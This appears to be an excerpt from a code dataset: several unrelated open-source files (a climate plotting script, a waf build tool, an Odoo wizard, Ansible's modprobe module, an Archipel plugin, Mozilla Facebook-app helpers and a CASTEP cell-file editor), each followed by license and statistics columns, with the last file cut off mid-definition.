plt.rc('ytick',color='white')
plt.rc('axes',labelcolor='white')
plt.rc('axes',facecolor='black')
### Select map type
style = 'global'
if style == 'ortho':
m = Basemap(projection='ortho',lon_0=-90,
lat_0=70,resolution='l',round=True)
elif style == 'polar':
m = Basemap(projection='npstere',boundinglat=67,lon_0=270,resolution='l',round =True)
elif style == 'global':
m = Basemap(projection='moll',lon_0=0,resolution='l',area_thresh=10000)
### Begin loop of years/months
for i in range(sst.shape[0]):
fig = plt.figure()
ax = plt.subplot(111)
for txt in fig.texts:
txt.set_visible(False)
var = sst[i,:,:]
m.drawmapboundary(fill_color='k')
m.drawcoastlines(color='k',linewidth=0.4)
### Colorbar limits
barlim = np.arange(0,31,5)
### Make the plot continuous
var, lons_cyclic = addcyclic(var, lons)
var, lons_cyclic = shiftgrid(180., var, lons_cyclic, start=False)
lon2d, lat2d = np.meshgrid(lons_cyclic, lats)
x, y = m(lon2d, lat2d)
cs = plt.contourf(x,y,var,np.arange(-1.8,31.1,1),
extend='max')
cmap = ncm.cmap('MPL_gnuplot')
cs.set_cmap(cmap)
t = plt.annotate(r'\textbf{%s}' % yearsqq[i],textcoords='axes fraction',
xy=(0,0), xytext=(0.34,1.03),
fontsize=50,color='w',alpha=0.6)
t1 = plt.annotate(r'\textbf{GRAPHIC}: Zachary Labe (@ZLabe)',
textcoords='axes fraction',
xy=(0,0), xytext=(0.02,-0.167),
fontsize=4.5,color='w',alpha=0.6)
t2 = plt.annotate(r'\textbf{SOURCE}: https://www1.ncdc.noaa.gov/',
textcoords='axes fraction',
xy=(0,0), xytext=(0.02,-0.197),
fontsize=4.5,color='w',alpha=0.6)
t3 = plt.annotate(r'\textbf{DATA}: NOAA ERSSTv5, Huang et al. (2017)',
textcoords='axes fraction',
xy=(0,0), xytext=(0.02,-0.227),
fontsize=4.5,color='w',alpha=0.6)
t4 = plt.annotate(r'\textbf{SEA SURFACE TEMPERATURES}',
textcoords='axes fraction',
xy=(0,0), xytext=(0.24,-0.036),fontsize=13,color='w',alpha=0.6)
m.fillcontinents(color='k')
cbar = plt.colorbar(cs,drawedges=False,orientation='horizontal',
pad = 0.04,fraction=0.035)
cbar.set_ticks(barlim)
cbar.set_ticklabels(list(map(str,barlim)))
cbar.set_label(r'\textbf{$\bf{^\circ}$\textbf{C}}',fontsize=13,
color='w')
cbar.ax.tick_params(axis='x', size=.001)
cbar.ax.tick_params(labelsize=6)
plt.subplots_adjust(bottom=0.2)
### Save figure to create animation using ImageMagick
if i < 10:
plt.savefig(directoryfigure + 'sstq_00%s.png' % (i),
dpi=200)
elif i < 100:
plt.savefig(directoryfigure + 'sstq_0%s.png' % (i),
dpi=200)
else:
plt.savefig(directoryfigure + 'sstq_%s.png' % (i),
dpi=200)
### Remove text for each figure
t.remove()
t1.remove()
t2.remove()
t3.remove()
t4.remove() | mit | -3,789,496,145,167,507,000 | 31.4875 | 89 | 0.550317 | false |
Chiru/NVE_Simulation | NS3/waf-tools/misc.py | 69 | 11666 | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2010 (ita)
"""
This tool is totally deprecated
Try using:
.pc.in files for .pc files
the feature intltool_in - see demos/intltool
make-like rules
"""
import shutil, re, os
from waflib import TaskGen, Node, Task, Utils, Build, Errors
from waflib.TaskGen import feature, after_method, before_method
from waflib.Logs import debug
def copy_attrs(orig, dest, names, only_if_set=False):
"""
copy class attributes from an object to another
"""
for a in Utils.to_list(names):
u = getattr(orig, a, ())
if u or not only_if_set:
setattr(dest, a, u)
def copy_func(tsk):
"Make a file copy. This might be used to make other kinds of file processing (even calling a compiler is possible)"
env = tsk.env
infile = tsk.inputs[0].abspath()
outfile = tsk.outputs[0].abspath()
try:
shutil.copy2(infile, outfile)
except (OSError, IOError):
return 1
else:
if tsk.chmod: os.chmod(outfile, tsk.chmod)
return 0
def action_process_file_func(tsk):
"Ask the function attached to the task to process it"
if not tsk.fun: raise Errors.WafError('task must have a function attached to it for copy_func to work!')
return tsk.fun(tsk)
@feature('cmd')
def apply_cmd(self):
"call a command everytime"
if not self.fun: raise Errors.WafError('cmdobj needs a function!')
tsk = Task.TaskBase()
tsk.fun = self.fun
tsk.env = self.env
self.tasks.append(tsk)
tsk.install_path = self.install_path
@feature('copy')
@before_method('process_source')
def apply_copy(self):
Utils.def_attrs(self, fun=copy_func)
self.default_install_path = 0
lst = self.to_list(self.source)
self.meths.remove('process_source')
for filename in lst:
node = self.path.find_resource(filename)
if not node: raise Errors.WafError('cannot find input file %s for processing' % filename)
target = self.target
if not target or len(lst)>1: target = node.name
# TODO the file path may be incorrect
newnode = self.path.find_or_declare(target)
tsk = self.create_task('copy', node, newnode)
tsk.fun = self.fun
tsk.chmod = getattr(self, 'chmod', Utils.O644)
if not tsk.env:
tsk.debug()
raise Errors.WafError('task without an environment')
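# Hedged wscript sketch (added; not from the original tool): the 'copy' feature above
# would typically be driven from a build function, e.g.
#     bld(features='copy', source='data.txt', target='data.copy', chmod=Utils.O644)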
def subst_func(tsk):
"Substitutes variables in a .in file"
m4_re = re.compile('@(\w+)@', re.M)
code = tsk.inputs[0].read() #Utils.readf(infile)
# replace all % by %% to prevent errors by % signs in the input file while string formatting
code = code.replace('%', '%%')
s = m4_re.sub(r'%(\1)s', code)
env = tsk.env
di = getattr(tsk, 'dict', {}) or getattr(tsk.generator, 'dict', {})
if not di:
names = m4_re.findall(code)
for i in names:
di[i] = env.get_flat(i) or env.get_flat(i.upper())
tsk.outputs[0].write(s % di)
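# Illustrative sketch (added; not from the original tool): given a template file
# containing '@VERSION@', subst_func rewrites it to '%(VERSION)s' and formats it with
# the task's dict (or matching env variables), so a wscript could use
#     bld(features='subst', source='config.h.in', target='config.h',
#         dict={'VERSION': '1.0'})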
@feature('subst')
@before_method('process_source')
def apply_subst(self):
Utils.def_attrs(self, fun=subst_func)
lst = self.to_list(self.source)
self.meths.remove('process_source')
self.dict = getattr(self, 'dict', {})
for filename in lst:
node = self.path.find_resource(filename)
if not node: raise Errors.WafError('cannot find input file %s for processing' % filename)
if self.target:
newnode = self.path.find_or_declare(self.target)
else:
newnode = node.change_ext('')
try:
self.dict = self.dict.get_merged_dict()
except AttributeError:
pass
if self.dict and not self.env['DICT_HASH']:
self.env = self.env.derive()
keys = list(self.dict.keys())
keys.sort()
lst = [self.dict[x] for x in keys]
self.env['DICT_HASH'] = str(Utils.h_list(lst))
tsk = self.create_task('copy', node, newnode)
tsk.fun = self.fun
tsk.dict = self.dict
tsk.dep_vars = ['DICT_HASH']
tsk.chmod = getattr(self, 'chmod', Utils.O644)
if not tsk.env:
tsk.debug()
raise Errors.WafError('task without an environment')
####################
## command-output ####
####################
class cmd_arg(object):
"""command-output arguments for representing files or folders"""
def __init__(self, name, template='%s'):
self.name = name
self.template = template
self.node = None
class input_file(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_resource(self.name)
if self.node is None:
raise Errors.WafError("Input file %s not found in " % (self.name, base_path))
def get_path(self, env, absolute):
if absolute:
return self.template % self.node.abspath()
else:
return self.template % self.node.srcpath()
class output_file(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_or_declare(self.name)
if self.node is None:
raise Errors.WafError("Output file %s not found in " % (self.name, base_path))
def get_path(self, env, absolute):
if absolute:
return self.template % self.node.abspath()
else:
return self.template % self.node.bldpath()
class cmd_dir_arg(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_dir(self.name)
if self.node is None:
raise Errors.WafError("Directory %s not found in " % (self.name, base_path))
class input_dir(cmd_dir_arg):
def get_path(self, dummy_env, dummy_absolute):
return self.template % self.node.abspath()
class output_dir(cmd_dir_arg):
def get_path(self, env, dummy_absolute):
return self.template % self.node.abspath()
class command_output(Task.Task):
color = "BLUE"
def __init__(self, env, command, command_node, command_args, stdin, stdout, cwd, os_env, stderr):
Task.Task.__init__(self, env=env)
assert isinstance(command, (str, Node.Node))
self.command = command
self.command_args = command_args
self.stdin = stdin
self.stdout = stdout
self.cwd = cwd
self.os_env = os_env
self.stderr = stderr
if command_node is not None: self.dep_nodes = [command_node]
self.dep_vars = [] # additional environment variables to look
def run(self):
task = self
#assert len(task.inputs) > 0
def input_path(node, template):
if task.cwd is None:
return template % node.bldpath()
else:
return template % node.abspath()
def output_path(node, template):
fun = node.abspath
if task.cwd is None: fun = node.bldpath
return template % fun()
if isinstance(task.command, Node.Node):
argv = [input_path(task.command, '%s')]
else:
argv = [task.command]
for arg in task.command_args:
if isinstance(arg, str):
argv.append(arg)
else:
assert isinstance(arg, cmd_arg)
argv.append(arg.get_path(task.env, (task.cwd is not None)))
if task.stdin:
stdin = open(input_path(task.stdin, '%s'))
else:
stdin = None
if task.stdout:
stdout = open(output_path(task.stdout, '%s'), "w")
else:
stdout = None
if task.stderr:
stderr = open(output_path(task.stderr, '%s'), "w")
else:
stderr = None
if task.cwd is None:
cwd = ('None (actually %r)' % os.getcwd())
else:
cwd = repr(task.cwd)
debug("command-output: cwd=%s, stdin=%r, stdout=%r, argv=%r" %
(cwd, stdin, stdout, argv))
if task.os_env is None:
os_env = os.environ
else:
os_env = task.os_env
command = Utils.subprocess.Popen(argv, stdin=stdin, stdout=stdout, stderr=stderr, cwd=task.cwd, env=os_env)
return command.wait()
@feature('command-output')
def init_cmd_output(self):
Utils.def_attrs(self,
stdin = None,
stdout = None,
stderr = None,
# the command to execute
command = None,
# whether it is an external command; otherwise it is assumed
# to be an executable binary or script that lives in the
# source or build tree.
command_is_external = False,
# extra parameters (argv) to pass to the command (excluding
# the command itself)
argv = [],
# dependencies to other objects -> this is probably not what you want (ita)
# values must be 'task_gen' instances (not names!)
dependencies = [],
# dependencies on env variable contents
dep_vars = [],
# input files that are implicit, i.e. they are not
# stdin, nor are they mentioned explicitly in argv
hidden_inputs = [],
# output files that are implicit, i.e. they are not
# stdout, nor are they mentioned explicitly in argv
hidden_outputs = [],
# change the subprocess to this cwd (must use obj.input_dir() or output_dir() here)
cwd = None,
# OS environment variables to pass to the subprocess
# if None, use the default environment variables unchanged
os_env = None)
@feature('command-output')
@after_method('init_cmd_output')
def apply_cmd_output(self):
if self.command is None:
raise Errors.WafError("command-output missing command")
if self.command_is_external:
cmd = self.command
cmd_node = None
else:
cmd_node = self.path.find_resource(self.command)
assert cmd_node is not None, ('''Could not find command '%s' in source tree.
Hint: if this is an external command,
use command_is_external=True''') % (self.command,)
cmd = cmd_node
if self.cwd is None:
cwd = None
args = []
inputs = []
outputs = []
for arg in self.argv:
if isinstance(arg, cmd_arg):
arg.find_node(self.path)
if isinstance(arg, input_file):
inputs.append(arg.node)
if isinstance(arg, output_file):
outputs.append(arg.node)
if self.stdout is None:
stdout = None
else:
assert isinstance(self.stdout, str)
stdout = self.path.find_or_declare(self.stdout)
if stdout is None:
raise Errors.WafError("File %s not found" % (self.stdout,))
outputs.append(stdout)
if self.stderr is None:
stderr = None
else:
assert isinstance(self.stderr, str)
stderr = self.path.find_or_declare(self.stderr)
if stderr is None:
raise Errors.WafError("File %s not found" % (self.stderr,))
outputs.append(stderr)
if self.stdin is None:
stdin = None
else:
assert isinstance(self.stdin, str)
stdin = self.path.find_resource(self.stdin)
if stdin is None:
raise Errors.WafError("File %s not found" % (self.stdin,))
inputs.append(stdin)
for hidden_input in self.to_list(self.hidden_inputs):
node = self.path.find_resource(hidden_input)
if node is None:
raise Errors.WafError("File %s not found in dir %s" % (hidden_input, self.path))
inputs.append(node)
for hidden_output in self.to_list(self.hidden_outputs):
node = self.path.find_or_declare(hidden_output)
if node is None:
raise Errors.WafError("File %s not found in dir %s" % (hidden_output, self.path))
outputs.append(node)
if not (inputs or getattr(self, 'no_inputs', None)):
raise Errors.WafError('command-output objects must have at least one input file or give self.no_inputs')
if not (outputs or getattr(self, 'no_outputs', None)):
raise Errors.WafError('command-output objects must have at least one output file or give self.no_outputs')
cwd = self.bld.variant_dir
task = command_output(self.env, cmd, cmd_node, self.argv, stdin, stdout, cwd, self.os_env, stderr)
task.generator = self
copy_attrs(self, task, 'before after ext_in ext_out', only_if_set=True)
self.tasks.append(task)
task.inputs = inputs
task.outputs = outputs
task.dep_vars = self.to_list(self.dep_vars)
for dep in self.dependencies:
assert dep is not self
dep.post()
for dep_task in dep.tasks:
task.set_run_after(dep_task)
if not task.inputs:
# the case for svnversion, always run, and update the output nodes
task.runnable_status = type(Task.TaskBase.run)(runnable_status, task, task.__class__) # always run
task.post_run = type(Task.TaskBase.run)(post_run, task, task.__class__)
# TODO the case with no outputs?
def post_run(self):
for x in self.outputs:
x.sig = Utils.h_file(x.abspath())
def runnable_status(self):
return self.RUN_ME
Task.task_factory('copy', vars=[], func=action_process_file_func)
| bsd-3-clause | 1,843,422,790,667,014,000 | 27.246973 | 116 | 0.686611 | false |
CompassionCH/compassion-modules | gift_compassion/wizards/collect_gifts_wizard.py | 4 | 1439 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <[email protected]>
#
# The licence is in the file __manifest__.py
#
##############################################################################
from odoo import api, fields, models
from odoo.tools import safe_eval
class CollectGiftWizard(models.TransientModel):
""" This wizard generates a Gift Invoice for a given contract. """
_name = 'gift.collect.wizard'
invoice_line_ids = fields.Many2many(
'account.invoice.line', string='Invoice lines',
)
domain = fields.Char(
default="[('product_id.name', '=', 'Child gift'),"
" ('state', '=', 'paid'),"
" ('gift_id', '=', False)]"
)
@api.onchange('domain')
def apply_domain(self):
return {
'domain': {'invoice_line_ids': safe_eval(self.domain)}
}
@api.multi
def collect_invoices(self):
# Read data in english
self.ensure_one()
gift = self.env['sponsorship.gift'].browse(
self.env.context['active_id'])
self.invoice_line_ids.write({'gift_id': gift.id})
return gift.write({
'invoice_line_ids': [(4, id) for id in self.invoice_line_ids.ids]
})
| agpl-3.0 | 3,357,152,643,305,090,600 | 31.659091 | 78 | 0.517745 | false |
CydarLtd/ansible | lib/ansible/modules/system/modprobe.py | 69 | 3813 | #!/usr/bin/python
#coding: utf-8 -*-
# (c) 2013, David Stygstra <[email protected]>
#
# This file is part of Ansible
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: modprobe
short_description: Add or remove kernel modules
requirements: []
version_added: 1.4
author:
- "David Stygstra (@stygstra)"
- "Julien Dauphant"
- "Matt Jeffery"
description:
- Add or remove kernel modules.
options:
name:
required: true
description:
- Name of kernel module to manage.
state:
required: false
default: "present"
choices: [ present, absent ]
description:
- Whether the module should be present or absent.
params:
required: false
default: ""
version_added: "1.6"
description:
- Modules parameters.
'''
EXAMPLES = '''
# Add the 802.1q module
- modprobe:
name: 8021q
state: present
# Add the dummy module
- modprobe:
name: dummy
state: present
params: 'numdummies=2'
'''
from ansible.module_utils.basic import *
from ansible.module_utils.pycompat24 import get_exception
import shlex
def main():
module = AnsibleModule(
argument_spec={
'name': {'required': True},
'state': {'default': 'present', 'choices': ['present', 'absent']},
'params': {'default': ''},
},
supports_check_mode=True,
)
args = {
'changed': False,
'failed': False,
'name': module.params['name'],
'state': module.params['state'],
'params': module.params['params'],
}
# Check if module is present
try:
modules = open('/proc/modules')
present = False
module_name = args['name'].replace('-', '_') + ' '
for line in modules:
if line.startswith(module_name):
present = True
break
modules.close()
except IOError:
e = get_exception()
module.fail_json(msg=str(e), **args)
# Check only; don't modify
if module.check_mode:
if args['state'] == 'present' and not present:
changed = True
elif args['state'] == 'absent' and present:
changed = True
else:
changed = False
module.exit_json(changed=changed)
# Add/remove module as needed
if args['state'] == 'present':
if not present:
command = [module.get_bin_path('modprobe', True), args['name']]
command.extend(shlex.split(args['params']))
rc, _, err = module.run_command(command)
if rc != 0:
module.fail_json(msg=err, **args)
args['changed'] = True
elif args['state'] == 'absent':
if present:
rc, _, err = module.run_command([module.get_bin_path('modprobe', True), '-r', args['name']])
if rc != 0:
module.fail_json(msg=err, **args)
args['changed'] = True
module.exit_json(**args)
if __name__ == '__main__':
main()
| gpl-3.0 | 7,061,765,552,863,909,000 | 27.036765 | 104 | 0.578809 | false |
CyrilPeponnet/Archipel | ArchipelAgent/archipel-agent-action-scheduler/archipelagentactionscheduler/__init__.py | 5 | 2236 | # -*- coding: utf-8 -*-
#
# __init__.py
#
# Copyright (C) 2010 Antoine Mercadal <[email protected]>
# Copyright, 2011 - Franck Villaume <[email protected]>
# This file is part of ArchipelProject
# http://archipelproject.org
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import actionscheduler
def make_archipel_plugin(configuration, entity, group):
"""
This function is the plugin factory. It will be called by the object you want
    to be plugged in. It must return a list with at least one dictionary containing
    a key for the plugin information, and a key for the plugin object.
@type configuration: Config Object
@param configuration: the general configuration object
@type entity: L{TNArchipelEntity}
@param entity: the entity that has load the plugin
@type group: string
@param group: the entry point group name in which the plugin has been loaded
@rtype: array
@return: array of dictionary containing the plugins informations and objects
"""
return [{"info": actionscheduler.TNActionScheduler.plugin_info(),
"plugin": actionscheduler.TNActionScheduler(configuration, entity, group)}]
def version():
"""
This function can be called runarchipel -v in order to get the version of the
installed plugin. You only should have to change the egg name.
@rtype: tupple
@return: tupple containing the package name and the version
"""
import pkg_resources
return (__name__, pkg_resources.get_distribution("archipel-agent-action-scheduler").version, [actionscheduler.TNActionScheduler.plugin_info()]) | agpl-3.0 | 8,855,939,689,701,253,000 | 42.862745 | 147 | 0.738819 | false |
yglazko/bedrock | bedrock/facebookapps/utils.py | 21 | 3549 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import json
import urllib
from base64 import urlsafe_b64decode
from django.conf import settings
from django.utils.translation import get_language
import commonware.log
import tower
from lib import l10n_utils
log = commonware.log.getLogger('facebookapps.utils')
def unwrap_signed_request(request):
"""
Decodes and returns Facebook's `signed_request` data.
See https://developers.facebook.com/docs/howtos/login/signed-request/
"""
try:
encoded_signed_request = request.REQUEST['signed_request']
except KeyError:
return {}
encoded_string_data = encoded_signed_request.partition('.')[2]
# Pad with `=` to make string length a multiple of 4
# and thus prevent a base64 error
padding = ''.ljust(4 - len(encoded_string_data) % 4, '=')
padded_string = ''.join([encoded_string_data, padding])
# Convert to byte data for base64
encoded_byte_data = bytes(padded_string)
signed_request = json.loads(urlsafe_b64decode(encoded_byte_data))
# Change Facebook locale's underscore to hyphen
# ex. `en_US` to `en-US`
try:
locale = signed_request['user']['locale']
except KeyError:
locale = None
if locale:
signed_request['user']['locale'] = locale.replace('_', '-')
return signed_request
def app_data_query_string_encode(app_data):
return urllib.urlencode([('app_data[{key}]'.format(key=key), value)
for key, value in app_data.items()])
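# Illustrative worked example (added for clarity, not in the original module):
# a dict such as {'foo': 'bar'} is encoded by the helper above as
# "app_data%5Bfoo%5D=bar", i.e. the URL-encoded form of app_data[foo]=bar.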
def get_best_locale(locale):
"""
Returns the most appropriate locale from the list of supported locales.
This can either be the locale itself (if it's supported), the main locale
    for that language if any, or failing that, the default `en-US`.
Adapted from `activate_locale` in Affiliates (http://bit.ly/17if6nh).
"""
# Compare using lowercase locales since they become lowercase once
# activated.
supported_locales = [loc.lower() for loc in settings.FACEBOOK_LOCALES]
# HACK: It's not totally clear to me where Django or tower do the matching
# that equates locales like es-LA to es, and I'm scared enough of getting
# it wrong to want to avoid it for the first release. So instead, we'll
# activate the requested locale, and then check what locale got chosen by
# django as the usable locale, and match that against our locale
# whitelist.
# TODO: Properly filter out locales prior to calling activate.
old_locale = get_language()
tower.activate(locale)
lang = get_language()
if lang.lower() not in supported_locales:
# Try to activate just the language and use the resulting locale
lang_prefix = lang.split('-')[0]
tower.activate(lang_prefix)
lang = get_language()
if lang.lower() not in supported_locales:
# Finally, try to find a locale with that language in the supported
# locales. Otherwise, use default en-US.
try:
lang = next(locale for locale in settings.FACEBOOK_LOCALES
if locale.startswith(lang_prefix))
except StopIteration:
lang = 'en-US'
tower.activate(old_locale)
return lang
def js_redirect(redirect_url, request):
return l10n_utils.render(request, 'facebookapps/js-redirect.html',
{'redirect_url': redirect_url})
| mpl-2.0 | -8,010,045,056,058,590,000 | 33.794118 | 79 | 0.673429 | false |
kaneod/physics | python/castep_special_atom.py | 2 | 11802 | #!/usr/bin/env python
################################################################################
#
# castep_special_atom.py
#
# Version 2.0
#
# Usage castep_special_atom.py SEED Z n
#
# Takes a .cell file SEED.cell, reads it in, changes the "nth" atom of type Z
# to Zspec, writes the file to SEED_special.cell with otherwise no changes.
#
# Designed for calculations where you have to repeat a calculation over all atoms
# of type Z with minor modifications to the pseudopotential for one special atom.
#
################################################################################
#
# Copyright 2013 Kane O'Donnell
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
#
################################################################################
#
# NOTES
#
# 1. WHY DID I NOT USE ESC_LIB? Because esc_lib.py has scipy dependencies that
# make it hard to get running on a cluster where the default python is from the
# dark ages and installing scipy is a pain anyway.
#
# 2. WHY DID I NOT JUST USE THE SAME DAMN ALGORITHMS AS ESC_LIB? Because it's
# a couple of years later and I have better ways of doing things now.
#
# 3. I did reuse SOME bits of esc_lib, ok? :o)
#
################################################################################
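#
# EXAMPLE (illustrative addition, not from the original author): for a
# hypothetical input file graphene.cell containing several carbon atoms, the
# invocation
#
#   python castep_special_atom.py graphene C 3
#
# would write graphene_special.cell in which the third carbon atom is listed
# as "C:exc" (the SPECIAL suffix defined below), leaving everything else
# unchanged.
#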
# This will fail on old python versions but is fine for 2.6 and 2.7
from __future__ import division
import argparse
# Debugging flag - set to 1 to see debug messages.
DEBUG=1
# SPECIAL text - what do you want added after the atomic Z to show it as special?
SPECIAL=":exc"
# Element dictionary - note that element 0 is given the UKN moniker.
elements = { 1 : "H", 2 : "He", 3 : "Li", 4 : "Be", 5 : "B", 6 : "C", 7 : "N", \
8 : "O", 9 : "F", 10 : "Ne", 11 : "Na", 12 : "Mg", 13 : "Al", 14 : "Si", \
15 : "P", 16 : "S", 17 : "Cl", 18 : "Ar", 19 : "K", 20 : "Ca", 21 : "Sc", \
22 : "Ti", 23 : "V", 24 : "Cr", 25 : "Mn", 26 : "Fe", 27 : "Co", 28 : "Ni", \
29 : "Cu", 30 : "Zn", 31 : "Ga", 32 : "Ge", 33 : "As", 34 : "Se", \
35 : "Br", 36 : "Kr", 37 : "Rb", 38 : "Sr", 39 : "Y", 40 : "Zr", 41 : "Nb", \
42 : "Mo", 43 : "Tc", 44 : "Ru", 45 : "Rh", 46 : "Pd", 47 : "Ag", \
48 : "Cd", 49 : "In", 50 : "Sn", 51 : "Sb", 52 : "Te", 53 : "I", 54 : "Xe", \
55 : "Cs", 56 : "Ba", 57 : "La", 58 : "Ce", 59 : "Pr", 60 : "Nd", \
61 : "Pm", 62 : "Sm", 63 : "Eu", 64 : "Gd", 65 : "Tb", 66 : "Dy", \
67 : "Ho", 68 : "Er", 69 : "Tm", 70 : "Yb", 71 : "Lu", \
72 : "Hf", 73 : "Ta", 74 : "W", 75 : "Re", 76 : "Os", 77 : "Ir", 78 : "Pt", \
79 : "Au", 80 : "Hg", 81 : "Tl", 82 : "Pb", 83 : "Bi", 84 : "Po", \
85 : "At", 86 : "Rn", 87 : "Fr", 88 : "Ra", 89 : "Ac", 90 : "Th", \
91 : "Pa", 92 : "U", 93 : "Np", 94 : "Pu", 95 : "Am", 96 : "Cm", 97 : "Bk", \
98 : "Cf", 99 : "Es", 100 : "Fm", 101 : "Md", 102 : "No", 103 : "Lr", \
104 : "Rf", 105 : "Db", 106 : "Sg", 107 : "Bh", 108 : "Hs", 109 : "Ds", \
110 : "Ds", 111 : "Rg", 112 : "Uub", 113 : "Uut", 114 : "Uuq", 115 : "Uup", \
116 : "Uuh", 117 : "Uus", 118 : "Uuo", 0 : "UKN"}
def getElementZ(elstr):
""" Z = getElementZ(elstr)
Given a string that contains either a Z number OR an element
abbreviation like Cu, MG, whatever, generates and returns the
appropriate integer Z.
"""
# Is it an integer?
try:
Z = int(elstr)
return Z
except ValueError:
# Not an integer.
if elstr.title() not in elements.values():
print "(libesc.getElementZ) Warning: Element %s is not in the elements dictionary. Returning 0 for element Z." % elstr
return 0
else:
for key, value in elements.items():
if elstr.title() == value:
return key
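# Worked examples for getElementZ (added for clarity, not in the original):
#   getElementZ("Fe") -> 26  (symbol lookup, case-insensitive via title())
#   getElementZ("26") -> 26  (already an integer Z)
#   getElementZ("Xx") -> 0   (unknown element, a warning is printed)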
def remove_comments(lines, comment_delim="#",just_blanks=False):
""" stripped = remove_comments(lines, comment_delim="#", just_blanks=False)
Takes a sequence of lines (presumably from a data file)
and strips all comments, including ones at the end of
lines that are otherwise not comments. Note that we can
only deal with one kind of comment at a time - just apply
multiple times to strip multiple comment types.
Note that we also remove *blank* lines in here, just in
case we're going to do line-by-line processing subsequently
rather than join/splitting (eg. like for XSF files).
If just_blanks is specified, we only eliminate the blanks.
"""
stripped = []
for line in lines:
if just_blanks:
if line.strip() != "":
stripped.append(line.strip())
else:
if not (line.strip().startswith(comment_delim) or line.strip() == ""):
stripped.append(line.partition(comment_delim)[0].strip())
return stripped
def uniqify(sequence, trans=None):
""" unique = uniqify(sequence, trans)
Produces an order-preserved list of unique elements in the passed
sequence. Supports a transform function so that passed elements
can be transformed before comparison if necessary.
"""
if trans is None:
def trans(x): return x
seen = {}
unique = []
for item in sequence:
marker = trans(item)
if marker in seen: continue
seen[marker] = 1
unique.append(item)
return unique
def identify_block(line):
""" blockstr = identify_block(line)
Identifies the actual block title of a castep block like "%block positions_frac".
Can happily cope with comments after the block and all the usual perturbations
such as POSITIONS_FRAC, positionsFrac, positions frac, etc.
"""
# Our working string is wstr. First remove any comments
wstr = line.split("!")[0]
# Remove the actual block
wstr = wstr.split()[1:]
# Combine everything that remains, then split by _ and rejoin.
wstr = "".join(wstr)
wstr = wstr.split("_")
wstr = "".join(wstr)
# Convert to lowercase and return
return wstr.lower()
def parse_cell(lines):
""" positions, species, properties = parse_cell(lines)
Reads a .cell file and returns the positions, the species and a properties
dictionary that contains whether positions_frac or positions_abs was used,
the extra functional lines from the file and anything else useful.
Note we remove all comments.
"""
# Strip all the blank lines and comments.
lines = remove_comments(lines, "!")
# We don't use the for loop here because we may want to sub-loop over blocks.
i = 0
species = []
positions = []
extralines = []
properties = {}
while i < len(lines):
cline = lines[i]
if cline.split()[0].lower() == "%block":
btitle = identify_block(cline)
if DEBUG:
print "Found a block", btitle
if btitle == "positionsfrac" or btitle == "positionsabs":
if btitle == "positionsfrac":
properties["fractional"] = True
else:
properties["fractional"] = False
i += 1
cline = lines[i]
# Might be a units line
if len(cline.split()) == 1:
properties["has units"] = True
properties["units"] = cline.split()[0].strip()
i += 1
cline = lines[i]
else:
properties["has units"] = False
while cline.split()[0].lower() != "%endblock":
species.append(getElementZ(cline.split()[0]))
positions.append([float(x) for x in cline.split()[1:4]])
i += 1
cline = lines[i]
else:
# We aren't interested in the other blocks: just add them to the extra lines.
extralines.append(cline)
else:
# If we aren't reading a block and it isn't a line we're interested in, add
# to the extra lines.
extralines.append(cline)
i += 1
properties["extra lines"] = extralines
return positions, species, properties
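# For reference (illustrative sketch, not part of the original script),
# parse_cell expects position blocks of the usual CASTEP form, e.g.:
#
#   %block positions_frac
#   C 0.000000 0.000000 0.000000
#   C 0.333333 0.666667 0.000000
#   %endblock positions_frac
#
# An absolute-coordinate block may also carry a single units line (e.g. "ang")
# straight after the %block line, which is what the "has units" property
# records.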
def write_new_cell(seed, pos, spec, props, special_index):
""" write_new_cell(seed, pos, spec, props, special_index)
Writes the new .cell file to seed+"_special.cell" and with the special atom listed
as "Z:exc" or whatever the custom SPECIAL text is set at the top of the file.
"""
f = open(seed+"_special.cell", 'w')
# Write all the extra lines first
for line in props["extra lines"]:
f.write(line+"\n")
if "%endblock" in line.lower():
f.write("\n")
# Now write the positions block.
f.write("\n")
if props["fractional"] == True:
f.write("%block positions_frac\n")
else:
f.write("%block positions_abs\n")
if props["has units"]:
f.write(props["units"]+"\n")
for i in range(len(pos)):
if i == special_index:
pstr = "%s%s %g %g %g\n" % (elements[spec[i]], SPECIAL, pos[i][0], pos[i][1], pos[i][2])
else:
pstr = "%s %g %g %g\n" % (elements[spec[i]], pos[i][0], pos[i][1], pos[i][2])
f.write(pstr)
if props["fractional"] == True:
f.write("%endblock positions_frac\n")
else:
f.write("%endblock positions_abs\n")
f.close()
def index_of_species_index(species, Z, n):
